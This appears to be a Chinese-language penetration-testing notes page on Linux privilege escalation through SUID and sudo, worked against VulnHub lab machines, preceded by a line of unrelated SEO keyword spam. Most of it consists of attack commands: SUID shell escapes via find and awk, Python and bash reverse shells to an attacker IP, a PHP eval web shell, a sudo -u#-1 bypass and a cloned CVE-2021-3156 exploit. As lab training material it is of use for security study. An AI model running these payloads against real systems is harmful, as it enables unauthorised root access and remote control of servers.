网站海报是怎么做的,做机网站,闵行兼职招聘信息,全球搜索引擎排行榜#应用场景#xff1a; 获取到Web权限或普通用户在Linux服务器上时进行的SUIDSUDO提权 SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中#xff0c;当一个程序运行的时候#xff0c;程序将从登录用户处继承权限。SUID被定… #应用场景 获取到Web权限或普通用户在Linux服务器上时进行的SUIDSUDO提权 SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中当一个程序运行的时候程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的程序/文件所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候将获取文件所有者的权限以及所有者的UID和GID。 SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行系统管理员集中的管理用户使用权限和使用主机配置文件/etc/sudoers除此配置之外的问题SUDO还有两个CVE漏洞CVE-2019-14287 CVE-2021-3156。 #利用参考 https://gtfobins.github.io/ #Linux系统提权-Web用户-Suid 1、SUIDGUID 环境https://www.vulnhub.com/entry/dc-1,292/ 命令SUID GUID find / -perm -us -type f 2/dev/null find / -perm -gs -type f 2/dev/null 项目LinEnum PEASS-ng /usr/bin/find . -exec /bin/sh \; 2、SUIDSUDO 环境https://www.vulnhub.com/entry/toppo-1,245/ 搭建创建任意虚拟机然后将toppo.vmdx文件改名并替换原来的vmdx文件 SUID /usr/bin/python2.7 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.139.141,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]); #Linux系统提权-Web用户-Sudo(cve) 1、SUDO 环境https://www.vulnhub.com/entry/toppo-1,245/ 搭建创建任意虚拟机然后将toppo.vmdx文件改名并替换原来的vmdx文件 SUDO: cat /etc/sudoers /usr/bin/awk BEGIN {system(/bin/sh)} 2、SUDO-CVE 环境https://www.vulnhub.com/entry/devguru-1,620/ -信息收集 808585 http://192.168.139.150/.git/ http://192.168.139.150/adminer.php http://192.168.139.150/backend/backend/auth http://192.168.139.150:8585/ http://192.168.139.150:8585/admin -git泄漏(利用点) python GitHack.py http://192.168.139.150/.git/ -访问管理Web入口 adminer.php 添加用户名密码 登录后台 模版 写入Shell function onStart(){ //蚁剑连接 eval($_POST[pass]); } -找备份寻突破升权 /var/backup/app.ini.bak 修改用户密码 登录后台 写入反弹 bash -c exec bash -i /dev/tcp/192.168.139.141/5555 01 -利用sudo提权cve sudo -l sudo -u#-1 sqlite3 /dev/null .shell /bin/sh git源码泄露 找到数据库密码登入 找到cms后台用户密码改为已知密码 登入cms后台写shell低权限 gitea数据库配置备份文件泄露 连接gitea数据库找到gitea的用户密码 登入gitea写shell更高权限 提权。 3、SUDO-CVE 环境kali2020 sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1 -判断sudoedit -s / 报错存在 -利用 git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 make chmod ax sudo-hax-me-a-sandwich ./sudo-hax-me-a-sandwich 0